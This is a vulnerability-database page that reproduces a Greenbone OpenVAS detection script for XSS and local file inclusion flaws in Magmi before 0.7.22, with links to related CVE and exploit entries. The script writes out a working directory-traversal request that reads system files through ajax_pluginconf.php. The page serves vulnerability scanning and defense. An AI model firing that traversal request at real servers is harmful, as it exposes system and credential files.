Lucene search
+L

Magmi (Magento Mass Importer) < 0.7.22 XSS / LFI Vulnerability

🗓️ 06 Feb 2015 00:00:00Reported by Copyright (C) 2015 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 44 Views

Magmi (Magento Mass Importer) < 0.7.22 XSS / LFI Vulnerability. Allows remote attackers to read arbitrary files and execute cross-site scripting attacks

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2015-2067
7 May 202604:25
circl
circl
Circl
CVE-2015-2068
25 Apr 202421:16
circl
cnvd
CNVD
Magento Server MAGMI plugin directory traversal vulnerability
28 Feb 201500:00
cnvd
cnvd
CNVD
Magento Server MAGMI plugin cross-site scripting vulnerability
28 Feb 201500:00
cnvd
cve
CVE
CVE-2015-2067
24 Feb 201517:00
cve
cve
CVE
CVE-2015-2068
24 Feb 201517:00
cve
cvelist
Cvelist
CVE-2015-2067
24 Feb 201517:00
cvelist
cvelist
Cvelist
CVE-2015-2068
24 Feb 201517:00
cvelist
exploitdb
Exploit DB
Magento Server MAGMI Plugin - Multiple Vulnerabilities
5 Feb 201500:00
exploitdb
euvd
EUVD
EUVD-2022-1936
3 Oct 202520:07
euvd
Rows per page
# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:magmi_project:magmi";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105196");
  script_version("2025-04-15T05:54:49+0000");
  script_cve_id("CVE-2015-2067", "CVE-2015-2068");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
  script_tag(name:"creation_date", value:"2015-02-06 17:04:13 +0100 (Fri, 06 Feb 2015)");
  script_name("Magmi (Magento Mass Importer) < 0.7.22 XSS / LFI Vulnerability");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2015 Greenbone AG");
  script_dependencies("sw_magento_magmi_detect.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("magmi/http/detected");

  script_xref(name:"URL", value:"http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html");

  script_tag(name:"summary", value:"Magmi (Magento Mass Importer) is prone to cross-site scripting
  (XSS) and local file inclusion (LFI) vulnerabilities.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"impact", value:"Remote attackers can use specially crafted requests with directory-
  traversal sequences ('../') to read arbitrary files in the context of the application.
  This may aid in further attacks.");

  script_tag(name:"affected", value:"Magmi version 0.7.21 and prior.");

  script_tag(name:"solution", value:"Update to version 0.7.22 or later.");

  script_tag(name:"qod_type", value:"remote_active");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("host_details.inc");
include("os_func.inc");
include("http_keepalive.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! dir = get_app_location( cpe:CPE, port:port ) )
  exit( 0 );

if( dir == "/" )
  dir = "";

files = traversal_files();

foreach pattern( keys( files ) ) {

  file = files[pattern];
  url = dir + "/web/ajax_pluginconf.php?file=../../../../../../../../../../../" + file + "&plugintype=utilities&pluginclass=CustomSQLUtility";

  if( http_vuln_check( port:port, url:url, pattern:pattern ) ) {
    report = http_report_vuln_url( port:port, url:url );
    security_message( port:port, data:report );
    exit( 0 );
  }
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2025 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 25
EPSS0.39424
44